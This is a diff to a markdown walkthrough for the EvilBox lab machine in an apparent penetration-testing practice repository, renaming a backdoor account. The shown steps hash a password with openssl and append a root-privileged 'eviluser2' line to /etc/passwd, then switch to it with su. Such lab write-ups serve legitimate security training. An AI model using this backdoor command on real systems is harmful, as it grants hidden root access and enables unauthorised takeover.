nobu1/PenetrationTestProject/HackingProjects/EvilBox/evilbox.md

     * Make a password using openssl
         - `openssl passwd -1 -salt usersalt`
         - Password: pass
-    * Add an eviluser in the /etc/passwd as a root
+    * Add an eviluser2 in the /etc/passwd as a root
         - `echo 'eviluser2:$1$usersalt$AdRPkkbvjFipmAjyOm.NT/:0:0:root:/root:/bin/bash' >> /etc/passwd`

 1. Change the backdoor account
-    * Change to the eviluser
+    * Change to the eviluser2
     ![Eviluser2](./img/evilbox-server16.png)
         - `su eviluser2`
         - Password: pass